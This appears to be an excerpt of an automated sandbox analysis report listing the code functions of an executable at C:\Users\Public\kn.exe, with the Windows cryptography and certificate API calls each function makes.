                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6D5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,12_2_00007FF627A6D5C2
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6F630 CryptAcquireContextW,GetLastError,#357,SetLastError,12_2_00007FF627A6F630
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC95FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,12_2_00007FF627AC95FC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B19580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,12_2_00007FF627B19580
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AAB55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,12_2_00007FF627AAB55C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE3590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,12_2_00007FF627AE3590
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0F570 CryptHashCertificate,SetLastError,12_2_00007FF627B0F570
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AFB4EC CryptDecodeObjectEx,SetLastError,12_2_00007FF627AFB4EC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA3504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,12_2_00007FF627AA3504
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B114F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,12_2_00007FF627B114F0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE34F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,12_2_00007FF627AE34F8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AFB464 CryptEncodeObjectEx,SetLastError,12_2_00007FF627AFB464
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0F4A0 CryptHashPublicKeyInfo,SetLastError,12_2_00007FF627B0F4A0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A45438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,12_2_00007FF627A45438
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACF488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,12_2_00007FF627ACF488
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE9480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,12_2_00007FF627AE9480
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA13F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,12_2_00007FF627AA13F0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC53E8 CryptEncodeObjectEx,GetLastError,#357,12_2_00007FF627AC53E8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,12_2_00007FF627ACB3D8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,12_2_00007FF627B1141C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,12_2_00007FF627AE342C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6B36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,12_2_00007FF627A6B36C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9B350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,12_2_00007FF627A9B350
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,12_2_00007FF627B1739C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B193A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,12_2_00007FF627B193A0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA5338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,12_2_00007FF627AA5338
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A77340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,12_2_00007FF627A77340
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF33B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,12_2_00007FF627AF33B0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC33A0 CryptVerifyCertificateSignature,CertCompareCertificateName,12_2_00007FF627AC33A0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE3390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError,12_2_00007FF627AE3390
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ADF2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,12_2_00007FF627ADF2F0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB92D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,12_2_00007FF627AB92D8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC32D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,12_2_00007FF627AC32D0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA92C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,12_2_00007FF627AA92C4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7B324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,12_2_00007FF627A7B324
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACD30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,12_2_00007FF627ACD30C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7D304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,12_2_00007FF627A7D304
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0D28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358,12_2_00007FF627B0D28C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B17290 NCryptIsKeyHandle,#359,#360,#357,#358,12_2_00007FF627B17290
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7D240 #357,CryptFindOIDInfo,#357,LocalFree,12_2_00007FF627A7D240
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AAB2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358,12_2_00007FF627AAB2B4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE32A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,12_2_00007FF627AE32A8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B39208 #357,NCryptEnumKeys,#360,#358,12_2_00007FF627B39208
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B17214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError,12_2_00007FF627B17214
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE11C8 NCryptVerifySignature,#205,#357,#357,#357,#357,12_2_00007FF627AE11C8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE31C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,12_2_00007FF627AE31C0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B171C8 BCryptDestroyKey,#360,12_2_00007FF627B171C8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B17178 BCryptCloseAlgorithmProvider,#360,12_2_00007FF627B17178
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACF168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey,12_2_00007FF627ACF168
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC5164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,12_2_00007FF627AC5164
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB51A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree,12_2_00007FF627AB51A4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC3188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError,12_2_00007FF627AC3188
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A760DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,12_2_00007FF627A760DA
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB4070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,12_2_00007FF627AB4070
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0E044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,12_2_00007FF627B0E044
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A75FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,12_2_00007FF627A75FE8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B45FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,12_2_00007FF627B45FF0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7FF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,12_2_00007FF627A7FF64
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB5F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,12_2_00007FF627AB5F54
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE5FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,12_2_00007FF627AE5FA8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE9F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,12_2_00007FF627AE9F90
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B45F20 CryptDecodeObjectEx,12_2_00007FF627B45F20
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A97F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,12_2_00007FF627A97F14
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B17EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,12_2_00007FF627B17EE8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD5F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,12_2_00007FF627AD5F04
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B45E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,12_2_00007FF627B45E3C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACDEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,12_2_00007FF627ACDEB0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9DEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,12_2_00007FF627A9DEA4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0DE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,12_2_00007FF627B0DE70
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A51DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,12_2_00007FF627A51DE8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD1E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,12_2_00007FF627AD1E2C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A75DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,12_2_00007FF627A75DF7
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA1D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,12_2_00007FF627AA1D70
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A99D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,12_2_00007FF627A99D6C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC3D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,12_2_00007FF627AC3D60
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B17D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,12_2_00007FF627B17D3C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1BD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,12_2_00007FF627B1BD3C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A75DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,12_2_00007FF627A75DA1
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9DD80 CertFindExtension,CryptDecodeObject,12_2_00007FF627A9DD80
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF5D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,12_2_00007FF627AF5D80
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B45D74 CryptDecodeObjectEx,strcmp,strcmp,12_2_00007FF627B45D74
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD5CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,12_2_00007FF627AD5CE8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0FD2C CryptDecryptMessage,GetLastError,#357,12_2_00007FF627B0FD2C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AFDD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,12_2_00007FF627AFDD1C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A93C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,12_2_00007FF627A93C60
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A81C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,12_2_00007FF627A81C50
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B45C54 CryptDecodeObjectEx,CryptDecodeObjectEx,12_2_00007FF627B45C54
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD1C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,12_2_00007FF627AD1C84
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE3BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,12_2_00007FF627AE3BEB
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A69BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,12_2_00007FF627A69BC8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AEBBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,12_2_00007FF627AEBBC0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9FC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,12_2_00007FF627A9FC34
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,12_2_00007FF627A7FC20
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B45B90 CryptDecodeObjectEx,memmove,12_2_00007FF627B45B90
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0FB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,12_2_00007FF627B0FB94
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AEFB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,12_2_00007FF627AEFB50
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AABB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,12_2_00007FF627AABB38
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B15B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,12_2_00007FF627B15B44
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1BB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,12_2_00007FF627B1BB50
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A45BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,12_2_00007FF627A45BA4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B17B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,12_2_00007FF627B17B60
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6BB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,12_2_00007FF627A6BB80
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA3B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,12_2_00007FF627AA3B14
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD9AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,12_2_00007FF627AD9AF8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE7A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,12_2_00007FF627AE7A70
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0FA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,12_2_00007FF627B0FA84
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF9A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,12_2_00007FF627AF9A58
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AFBA50 CryptSignCertificate,SetLastError,12_2_00007FF627AFBA50
